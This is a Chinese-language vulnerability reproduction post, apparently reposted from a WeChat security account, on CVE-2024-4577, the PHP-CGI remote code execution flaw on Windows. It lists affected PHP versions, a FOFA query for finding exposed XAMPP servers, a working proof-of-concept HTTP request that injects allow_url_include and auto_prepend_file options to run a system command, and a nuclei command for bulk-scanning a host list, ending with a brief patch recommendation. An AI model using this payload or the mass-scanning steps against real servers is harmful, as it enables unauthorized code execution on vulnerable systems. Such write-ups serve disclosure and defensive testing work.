漏洞复现-CVE-2024-4577

admin 2024年7月4日07:46:12评论9 views字数 1246阅读4分9秒阅读模式
免责声明
文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!

:漏洞名称

PHP CGI Windows平台远程代码执行漏洞

:漏洞描述

PHP-CGI(PHP Common Gateway Interface)是一种用于在Web服务器和PHP解释器之间进行通信的接口协议。通常情况下,PHP被集成到Web服务器中,比如Apache或Nginx,以处理动态内容生成和处理。但是,PHP-CGI提供了一种独立于Web服务器的方式来执行PHP脚本。
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码。

漏洞影响版本

PHP 8.3 < 8.3.8 PHP 8.2 < 8.2.20 PHP 8.1 < 8.1.29 

:网络空间测绘查询

FOFA

header="Xampps_info" || body="/xampps.jpg" || (header="location http" && header="xampp"|| body="content="Kai Oswald Seidler" || title="XAMPP for" || title="XAMPP Version" || body="font-size: 1.2em; color: red;">New XAMPP"

漏洞复现-CVE-2024-4577

:漏洞复现

poc
GET /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Content-Type: application/x-www-form-urlencodedREDIRECT-STATUS:1<?php system("dir");?>

漏洞复现-CVE-2024-4577

命令执行漏洞是指恶意用户通过输入特定的命令或者数据,成功地执行了系统命令,从而导致系统受到攻击。这种漏洞通常发生在没有充分验证用户输入的情况下,将用户提供的数据直接传递给系统命令执行的场景中
:批量检测
nuclei.exe -t CVE-2024-4577.yaml -l host.txt
:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。

原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-4577

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月4日07:46:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-CVE-2024-4577https://cn-sec.com/archives/2837898.html

发表评论

匿名网友 填写信息